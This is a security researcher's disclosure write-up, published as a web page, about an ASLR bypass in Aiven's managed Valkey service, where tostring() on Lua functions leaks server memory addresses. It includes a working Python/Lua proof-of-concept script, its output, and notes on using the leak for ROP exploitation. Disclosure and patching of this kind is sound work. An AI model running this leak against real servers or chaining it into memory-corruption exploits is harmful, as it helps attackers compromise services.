165	.nbgroup h2{font-size:13px;letter-spacing:2px;text-transform:uppercase;color:var(--accent);margin:0 0 4px;font-weight:600;}
166	.nbgroup .gd{color:var(--faint);font-size:13px;margin:0 0 14px;}
167	.nbtable{width:100%;border-collapse:collapse;font-size:14px;border:1px solid var(--line);border-radius:12px;overflow:hidden;}
168	.nbtable tr{border-top:1px solid var(--line);}
169	.nbtable tr:first-child{border-top:none;}
170	.nbtable tr:hover{background:var(--panel);}
171	.nbtable td{padding:14px 16px;vertical-align:top;}
172	.nbtable .cls{white-space:nowrap;color:var(--accent);font-family:ui-monospace,Menlo,monospace;font-size:11.5px;text-transform:uppercase;letter-spacing:.5px;width:150px;}
173	.nbtable .ti a{font-weight:600;color:var(--ink);}
174	.nbtable .ti a:hover{color:var(--accent);}
175	.nbtable .ol{color:var(--muted);font-size:13px;margin-top:3px;}
176	@media(max-width:680px){.nbtable .cls{width:auto;display:block;}}
177	</style>
178	<link rel="canonical" href="https://zionboggan.com/security-research-notebook/valkey-aslr-leak/">
179	<meta name="author" content="Zion Boggan">
180	<meta name="robots" content="index, follow, max-image-preview:large">
181	<meta property="og:type" content="article">
182	<meta property="og:site_name" content="Zion Boggan">
183	<meta property="og:title" content="ASLR Bypass via Lua Function Pointer Leak in Aiven Managed Valkey \| Zion Boggan">
184	<meta property="og:description" content="ASLR leak through replication metadata.">
185	<meta property="og:url" content="https://zionboggan.com/security-research-notebook/valkey-aslr-leak/">
186	<meta property="og:image" content="https://zionboggan.com/assets/og-default.png">
187	<meta name="twitter:card" content="summary_large_image">
188	<meta name="twitter:title" content="ASLR Bypass via Lua Function Pointer Leak in Aiven Managed Valkey \| Zion Boggan">
189	<meta name="twitter:description" content="ASLR leak through replication metadata.">
190	<meta name="twitter:image" content="https://zionboggan.com/assets/og-default.png">
191	<script type="application/ld+json">{"@context":"https://schema.org","@type":"TechArticle","headline":"ASLR Bypass via Lua Function Pointer Leak in Aiven Managed Valkey","description":"ASLR leak through replication metadata.","url":"https://zionboggan.com/security-research-notebook/valkey-aslr-leak/","image":"https://zionboggan.com/assets/og-default.png","author":{"@type":"Person","name":"Zion Boggan","url":"https://zionboggan.com"},"publisher":{"@type":"Person","name":"Zion Boggan"}}</script>
192	</head><body>
193	<nav><div class="wrap">
194	<a class="brand mono" href="/" style="color:var(--ink)">zion_boggan<span class="dot">.</span></a>
195	<span class="links"><a href="/#oversight">Oversight</a><a href="/#labs">Labs</a><a href="/#research">Research</a><a href="/security-research-notebook/">Notebook</a><a href="/">Home</a></span>
196	</div></nav>
197	<header class="hero detail-hero"><div class="wrap">
198	<a class="back" href="/security-research-notebook/">← Research notebook</a>
199	<div class="kicker">Info disclosure</div>
200	<h1>ASLR Bypass via Lua Function Pointer Leak in Aiven Managed Valkey</h1>
201	</div></header>
202	<section><div class="wrap"><div class="content">
203	<h2>Summary</h2>
204	<p>Any authenticated user on Aiven’s managed Valkey service can leak heap/code segment memory addresses of the <code>valkey-server</code> process by calling <code>tostring()</code> on Lua function objects within an <code>EVAL</code> script. The <code>redis</code> and <code>server</code> tables in the Lua scripting environment expose 12+ C function pointers via their string representations (e.g., <code>function: 0x7f76122ca790</code>). These addresses defeat Address Space Layout Randomization (ASLR) for the server process.</p>
205	<p>While this is an information disclosure finding on its own, it directly enables exploitation of any memory corruption vulnerability (such as the previously reported RESTORE listpack assertion bug) by providing the attacker with precise memory layout information needed to build reliable exploits.</p>
206	<h2>Affected Target</h2>
207	<ul>
208	<li><strong>Service:</strong> Aiven for Valkey (Tier 1)</li>
209	<li><strong>Version tested:</strong> Valkey 8.1.4</li>
210	<li><strong>Instance:</strong> <host>:26161</li>
211	</ul>
212	<h2>Severity</h2>
213	<p><strong>P3, Information Disclosure</strong></p>
214	<p><strong>VRT:</strong> Server Security Misconfiguration > Lack of Security Headers > Information Disclosure</p>
215	<p><strong>CVSS 3.1:</strong> <code>CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N</code>, <strong>Score: 4.3 (Medium)</strong></p>
216	<h2>Steps to Reproduce</h2>
217	<pre><code class="language-python">import redis
218
219	r = redis.Redis(
220	host="<host>", port=26161, username='default', password='<password>',
221	ssl=True, ssl_cert_reqs='required',
222	ssl_ca_certs='/etc/ssl/certs/ca-certificates.crt',
223	decode_responses=True, socket_timeout=10
224	)
225
226	result = r.execute_command('EVAL', '''
227	local ptrs = {}
228	for k,v in pairs(redis) do
229	if type(v) == "function" then
230	ptrs[#ptrs+1] = k .. "=" .. tostring(v)
231	end
232	end
233	table.sort(ptrs)
234	return ptrs
235	''', 0)
236
237	for ptr in result:
238	print(ptr)
239	</code></pre>
240	<p><strong>Actual output on Aiven:</strong></p>
241	<pre><code>acl_check_cmd=function: 0x7f76122ca790
242	breakpoint=function: 0x7f76122ca9a0
243	call=function: 0x7f76122ca2b0
244	debug=function: 0x7f76122ca8c0
245	error_reply=function: 0x7f76122ca580
246	log=function: 0x7f76122ca700
247	pcall=function: 0x7f76122ca310
248	register_function=function: 0x7f76122cab90
249	replicate_commands=function: 0x7f76122caa30
250	set_repl=function: 0x7f76122ca640
251	sha1hex=function: 0x7f76122ca430
252	status_reply=function: 0x7f76122ca4d0
253	</code></pre>
254	<p>These are actual virtual memory addresses of C functions in the <code>valkey-server</code> process. The addresses are in the <code>0x7f76122ca...</code> range, indicating they’re in a dynamically loaded library segment, consistent with the Valkey executable or a loaded shared library.</p>
255	<h2>Impact</h2>
256	<ol>
257	<li>
258	<p><strong>ASLR defeat:</strong> Address Space Layout Randomization is the primary defense against memory corruption exploitation on modern Linux. Leaking function pointers reveals the base address of the code segment, allowing an attacker to calculate the address of any function or gadget.</p>
259	</li>
260	<li>
261	<p><strong>Exploitation enabler:</strong> Combined with any memory corruption primitive (buffer overflow, use-after-free, or assertion-reachable state), these addresses enable reliable ROP chain construction or function pointer overwrite attacks.</p>
262	</li>
263	<li>
264	<p><strong>Process-level information:</strong> The leaked addresses persist across multiple EVAL calls, confirming they belong to the long-running server process (not a sandboxed child). A server restart randomizes the addresses (confirmed via previous crash tests).</p>
265	</li>
266	<li>
267	<p><strong>Additional info leaked via other commands:</strong>, <code>CLIENT LIST</code> reveals internal IPv6 address: <code>fda7:a938:5bfe:5fa6:0:5a8:649:f83d</code>, <code>MODULE LIST</code> reveals module path: <code>/usr/valkey-8.1/usr/lib64/modules/libjson.so</code>, <code>HELLO</code> reveals internal server configuration, <code>os.clock()</code> via Lua reveals process CPU time (1038+ seconds)</p>
268	</li>
269	</ol>
270	<h2>Root Cause</h2>
271	<p>Valkey’s Lua sandbox does not override the default <code>tostring()</code> behavior for C function objects. In standard Lua 5.1, <code>tostring()</code> on a C function returns <code>"function: 0x<address>"</code> where the address is the actual memory address of the C function. The sandbox should either:
272	- Override <code>tostring()</code> to return opaque identifiers for function objects
273	- Remove function pointer addresses from the string representation
274	- Block <code>tostring()</code> on the <code>redis</code>/<code>server</code> table entries</p>
275	<h2>Recommended Fix</h2>
276	<p>Patch the Lua sandbox to override <code>tostring()</code> for function values, returning a non-address identifier (e.g., <code>"function: redis.call"</code> instead of <code>"function: 0x7f76122ca2b0"</code>).</p>
277	<hr><p style="color:var(--faint);font-size:12.5px;font-family:ui-monospace,Menlo,monospace">Source · github.com/zionboggan/security-research-notebook · writeups/aiven/valkey-aslr-leak.md</p>
278	</div></div></section>
279	<footer><div class="wrap row">
280	<div class="links"><a href="/">Portfolio</a><a href="https://www.linkedin.com/in/zion-boggan">LinkedIn</a><a href="/security-research-notebook/">Notebook</a><a href="mailto:zionboggan0@gmail.com">Email</a></div>
281	<div class="note">Coordinated-disclosure research. Findings appear here only after the program's disclosure window closed, the patch shipped, or a CVE was published. No customer data was accessed.</div>
282	</div></footer>
283	</body></html>